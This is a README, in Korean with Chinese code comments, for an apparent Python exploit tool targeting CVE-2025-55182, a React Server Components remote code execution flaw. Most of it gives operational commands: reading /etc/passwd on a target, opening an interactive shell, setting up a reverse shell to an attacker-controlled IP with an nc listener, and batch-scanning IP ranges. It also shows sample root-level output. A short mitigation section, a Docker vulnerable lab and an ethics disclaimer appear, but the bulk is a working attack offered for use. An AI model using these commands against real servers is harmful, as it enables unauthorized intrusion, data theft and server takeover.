# CVE-2025-55182 (React Server Components RCE) 기반 Python 익스플로잇 대화형 셸, 리버스 셸, 배치 스캐닝, 그리고 Docker 기반 취약 환경을 포함하여 승인된 보안 테스트를 위한 Python 기반 익스플로잇입니다.
| 속성 | 값 |
|---|
| CVE ID | CVE-2025-55182 |
| CVSS 점수 | 9.8 (치명적) |
| 공격 벡터 | 네트워크 |
| 공격 복잡도 | 낮음 |
| 요구 권한 | 없음 |
| 사용자 상호작용 | 없음 |
| 영향 | 높음 (기밀성, 무결성, 가용성) |
| 영향받는 구성 요소 | React Server Components (RSC) |
| 영향받는 버전 | React 18.x - 19.x (특정 빌드 버전) |
| 공개 날짜 | 2025년 12월 3일 |
| CVE 별칭 | React2Shell |
근본 원인: React Server Components는 RSC 페이로드를 처리할 때 사용자가 제공한 JavaScript 객체를 올바르게 역직렬화하지 않아, 공격자가 서버에서 실행되는 악성 코드를 주입할 수 있습니다.
공격 벡터: HTTP 요청의 악성 RSC 페이로드 영향: 인증 없는 원격 코드 실행, 서버 장악, 데이터 유출
# 克隆仓库
git clone https://github.com/hujiaozhuzhu/gju.git
cd gju
# 安装依赖
pip install -r requirements.txt
# 安装依赖
pip install requests
# 在易受攻击的目标上执行命令
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 -c "whoami"
# 交互式Shell模式
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 --shell
# 自定义命令
python exploit/cve_2025_55182.py -u http://target.com -c "cat /etc/passwd"
# 使用自定义IP/端口建立反向Shell
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444
# 批量扫描
python exploit/batch_scanner.py -f targets.txt
# 详细模式
python exploit/cve_2025_55182.py -u http://target.com -v
# 自定义User-Agent
python exploit/cve_2025_55182.py -u http://target.com --ua "Mozilla/5.0"
cd target
docker-compose up -d
cd target
npm install
npm run dev
취약한 애플리케이션 접속: http://localhost:3000
취약한 서버에서 단일 명령 실행:
python exploit/cve_2025_55182.py -u http://target.com -c "id"
예상 출력:
[+] 漏洞检测成功:React Server Components RCE
[+] 执行命令: id
[+] 响应:
uid=0(root) gid=0(root) groups=0(root)
취약한 서버에서 대화형 셸 획득:
python exploit/cve_2025_55182.py -u http://target.com --shell
기능:
리버스 셸 연결 수립:
# 在攻击者机器上
nc -lvnp 4444
# 运行利用工具
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444
여러 대상에 대한 취약점 스캔:
# 创建目标文件
cat > targets.txt << EOF
http://192.168.1.10:3000
http://192.168.1.11:3000
http://192.168.1.12:3000
EOF
# 运行批量扫描器
python exploit/batch_scanner.py -f targets.txt
React 업그레이드
npm install react@latest
# 升级到修复版本
RSC 요청 차단
// 临时禁用RSC
const config = {
enableRSC: false
}
WAF 규칙
# 搭建易受攻击环境
cd target && docker-compose up -d
# 测试漏洞
python exploit/cve_2025_55182.py -u http://localhost:3000 -c "echo 'CVE-2025-55182 RCE confirmed'"
# 运行测试套件
python tests/test_exploit.py
이 도구는 다음을 시연합니다:
이 프로젝트는 MIT 라이선스 하에 제공됩니다 - 자세한 내용은 LICENSE 파일을 참조하십시오.
중요: 이 도구는 교육 및 공인된 보안 테스트 목적으로만 사용됩니다.
이 도구를 사용함으로써 귀하는 다음에 동의합니다:
프로덕션 시스템에서 이 취약점을 발견한 경우:
공급업체에 보고
CVE 배정
보안 커뮤니티
기억하세요: 보안 연구는 항상 윤리적이고 합법적이어야 합니다. 여러분의 기술로 인터넷을 더 안전하게 만드세요! 🛡️